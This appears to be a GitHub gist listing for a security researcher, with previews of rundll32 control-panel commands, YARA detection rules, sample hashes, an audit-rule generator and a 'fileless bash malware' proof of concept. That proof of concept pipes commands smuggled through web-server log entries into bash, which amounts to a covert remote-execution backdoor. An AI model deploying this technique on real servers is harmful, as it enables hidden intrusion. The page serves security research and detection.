- RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0
- RunDll32.exe msrating.dll,RatingSetupUI
Tim Brown timb-machine
timb-machine
/ Windows command line gui access.md
Created
July 12, 2021 06:17
— forked from scotgabriel/Windows command line gui access.md
Common windows functions via rundll user32 and control panel
timb-machine
/ Fileless bash malware PoC
Last active
September 19, 2022 18:26
Fileless bash malware PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash | |
| $ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~' | |
| root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash | |
| root 11125 10680 17 21:27 pts/1 00:00:02 bash | |
| $ ls /proc/11125/fd | |
| total 0 | |
| dr-x------ 2 root root 0 Jun 28 21:27 . |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aix 10ac312c8dd02e417dd24d53c99525c29d74dcbc84730351ad7a4e0a4b1a0eba.xcoff | |
| aix 3a5ba44f140821849de2d82d5a137c3bb5a736130dddb86b296d94e6b421594c.xcoff | |
| aix ca9ab48d293cc84092e8db8f0ca99cb155b30c61d32a1da7cd3687de454fe86c.xcoff | |
| aix d465637518024262c063f4a82d799a4e40ff3381014972f24ea18bc23c3b27ee.xcoff | |
| enterpriseunix2 10ac312c8dd02e417dd24d53c99525c29d74dcbc84730351ad7a4e0a4b1a0eba.xcoff | |
| enterpriseunix2 3a5ba44f140821849de2d82d5a137c3bb5a736130dddb86b296d94e6b421594c.xcoff | |
| enterpriseunix2 ca9ab48d293cc84092e8db8f0ca99cb155b30c61d32a1da7cd3687de454fe86c.xcoff | |
| enterpriseunix2 d465637518024262c063f4a82d799a4e40ff3381014972f24ea18bc23c3b27ee.xcoff |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "elf" | |
| rule enterpriseapps2 { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "Enterprise apps" | |
| strings: | |
| $db2 = "db2" nocase | |
| $oracle = "oracle" nocase | |
| $mysql = "mysql" nocase |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "elf" | |
| rule enterpriseunix2 { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "Enterprise UNIX" | |
| strings: | |
| $aix = "aix" nocase | |
| $solaris = "solaris" nocase | |
| $hpux = "hpux" nocase |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule adonunix2 { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "AD on UNIX" | |
| strings: | |
| $quest = "/quest" | |
| $sss = "/sss" | |
| $pbis = "/pbis" | |
| $ipa = "/ipa" | |
| $samba = "/samba" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule ciscotools { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "Cisco tools" | |
| strings: | |
| $labs = "labs.portcullis.co.uk" | |
| $portcullislabs = "portcullislabs" | |
| $CiscoCXSecurity = "CiscoCXSecurity" | |
| $timb_machine = "timb_machine" | |
| $pentestmonkey = "pentestmonkey" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Description: Accept environment changes. | |
| Accept environment changes during negotiation by the client. | |
| Author: Tim Brown <[email protected]> | |
| --- | |
| The information above should follow the Patch Tagging Guidelines, please | |
| checkout http://dep.debian.net/deps/dep3/ to learn about the format. Here | |
| are templates for supplementary fields that you might want to add: | |
| Origin: <vendor|upstream|other>, <url of original patch> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule aix { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "AIX binary" | |
| strings: | |
| $libca = "libc.a" | |
| $text = ".text" | |
| $data = ".data" | |
| condition: | |
| $libca and $text and $data |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| generate_file_rule () { | |
| filepermissions="${1}" | |
| rulename="${2}" | |
| while read filename | |
| do | |
| printf -- "-w %s -p %s -k %s\n" "${filename}" "${filepermissions}" "${rulename}" | |
| done | |
| } |